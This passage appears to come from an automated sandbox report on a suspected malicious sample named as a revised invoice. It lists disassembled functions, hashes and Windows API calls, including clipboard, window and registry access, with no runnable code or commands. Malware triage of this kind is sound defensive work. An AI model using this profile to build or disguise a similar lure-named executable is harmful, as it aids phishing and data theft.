                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: CloseConnectCreateRegistry
                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                              • API String ID: 3217815495-966354055
                              • Opcode ID: cce921d97e24dbf253ef9f1627752c5d4fb6d5c9aca8633edc33abbdd9bc0d54
                              • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                              • Opcode Fuzzy Hash: cce921d97e24dbf253ef9f1627752c5d4fb6d5c9aca8633edc33abbdd9bc0d54
                              • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                              APIs
                              • GetCursorPos.USER32(?), ref: 004566AE
                              • GetDesktopWindow.USER32 ref: 004566C3
                              • GetWindowRect.USER32(00000000), ref: 004566CA
                              • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                              • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                              • DestroyWindow.USER32(?), ref: 00456746
                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                              • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                              • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                              • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                              • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                              • IsWindowVisible.USER32(?), ref: 0045682C
                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                              • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                              • GetWindowRect.USER32(?,?), ref: 00456873
                              • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                              • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                              • CopyRect.USER32(?,?), ref: 004568BE
                              • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                              • String ID: ($,$tooltips_class32
                              • API String ID: 225202481-3320066284
                              • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                              • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                              • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                              • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                              APIs
                              • OpenClipboard.USER32(?), ref: 0046DCE7
                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                              • GetClipboardData.USER32(0000000D), ref: 0046DD01
                              • CloseClipboard.USER32 ref: 0046DD0D
                              • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                              • CloseClipboard.USER32 ref: 0046DD41
                              • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                              • GetClipboardData.USER32(00000001), ref: 0046DD8D
                              • CloseClipboard.USER32 ref: 0046DD99
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                              • String ID:
                              • API String ID: 15083398-0
                              • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                              • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                              • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                              • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                              APIs
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • GetWindowRect.USER32(?,?), ref: 00471CF7
                              • GetClientRect.USER32(?,?), ref: 00471D05
                              • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                              • GetSystemMetrics.USER32(00000008), ref: 00471D20
                              • GetSystemMetrics.USER32(00000004), ref: 00471D42
                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                              • GetSystemMetrics.USER32(00000007), ref: 00471D79
                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                              • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                              • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                              • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                              • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                              • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                              • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                              • GetClientRect.USER32(?,?), ref: 00471E8A
                              • GetStockObject.GDI32(00000011), ref: 00471EA6
                              • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                              • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                              • String ID: @$AutoIt v3 GUI
                              • API String ID: 867697134-3359773793
                              • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                              • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                              • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                              • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                              • API String ID: 1503153545-1459072770
                              • Opcode ID: 317b836bd45d303022c8cfe41fd482541af156a870e12d87d8544c7d52709fdd
                              • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                              • Opcode Fuzzy Hash: 317b836bd45d303022c8cfe41fd482541af156a870e12d87d8544c7d52709fdd
                              • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: __wcsicoll$__wcsnicmp
                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                              • API String ID: 790654849-32604322
                              • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                              • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                              • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                              • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 37a5c787a7b2188dc8d5479775b41731b0c96863aaa01ab20318fba061c3c2a8
                              • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                              • Opcode Fuzzy Hash: 37a5c787a7b2188dc8d5479775b41731b0c96863aaa01ab20318fba061c3c2a8
                              • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                              APIs
                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Window
                              • String ID: 0
                              • API String ID: 2353593579-4108050209
                              • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                              • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                              • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                              • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                              APIs
                              • GetSysColor.USER32(0000000F), ref: 0044A05E
                              • GetClientRect.USER32(?,?), ref: 0044A0D1
                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                              • GetWindowDC.USER32(?), ref: 0044A0F6
                              • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                              • ReleaseDC.USER32(?,?), ref: 0044A11B
                              • GetSysColor.USER32(0000000F), ref: 0044A131
                              • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                              • GetSysColor.USER32(0000000F), ref: 0044A14F
                              • GetSysColor.USER32(00000005), ref: 0044A15B
                              • GetWindowDC.USER32(?), ref: 0044A1BE
                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                              • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                              • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                              • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                              • ReleaseDC.USER32(?,00000000), ref: 0044A229
                              • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                              • GetSysColor.USER32(00000008), ref: 0044A265
                              • SetTextColor.GDI32(?,00000000), ref: 0044A270
                              • SetBkMode.GDI32(?,00000001), ref: 0044A282
                              • GetStockObject.GDI32(00000005), ref: 0044A28A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                              • String ID:
                              • API String ID: 1744303182-0
                              • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                              • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                              • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                              • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                              APIs
                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                              • __mtterm.LIBCMT ref: 00417C34
                                • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                              • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                              • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                              • __init_pointers.LIBCMT ref: 00417CE6
                              • __calloc_crt.LIBCMT ref: 00417D54
                              • GetCurrentThreadId.KERNEL32 ref: 00417D80
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                              • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                              • API String ID: 4163708885-3819984048
                              • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                              • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                              • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                              • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID:
                              • String ID: >>>AUTOIT SCRIPT<<<$\
                              • API String ID: 0-1896584978
                              • Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                              • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                              • Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                              • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: __wcsicoll$IconLoad
                              • String ID: blank$info$question$stop$warning
                              • API String ID: 2485277191-404129466
                              • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                              • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                              • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                              • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                              APIs
                              • LoadIconW.USER32(?,00000063), ref: 0045464C
                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                              • SetWindowTextW.USER32(?,?), ref: 00454678
                              • GetDlgItem.USER32(?,000003EA), ref: 00454690
                              • SetWindowTextW.USER32(00000000,?), ref: 00454697
                              • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                              • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                              • GetWindowRect.USER32(?,?), ref: 004546F5
                              • SetWindowTextW.USER32(?,?), ref: 00454765
                              • GetDesktopWindow.USER32 ref: 0045476F
                              • GetWindowRect.USER32(00000000), ref: 00454776
                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                              • GetClientRect.USER32(?,?), ref: 004547D2
                              • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                              • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                              • String ID:
                              • API String ID: 3869813825-0
                              • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                              • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                              • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                              • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                              APIs
                              • _wcslen.LIBCMT ref: 00464B28
                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                              • _wcslen.LIBCMT ref: 00464C28
                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                              • _wcslen.LIBCMT ref: 00464CBA
                              • _wcslen.LIBCMT ref: 00464CD0
                              • _wcslen.LIBCMT ref: 00464CEF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: _wcslen$Directory$CurrentSystem
                              • String ID: D
                              • API String ID: 1914653954-2746444292
                              • Opcode ID: 0d94b415f8f4be32da9437a4562fd2ea9250d6af123b13f45aceadf0defadff8
                              • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                              • Opcode Fuzzy Hash: 0d94b415f8f4be32da9437a4562fd2ea9250d6af123b13f45aceadf0defadff8
                              • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                              APIs
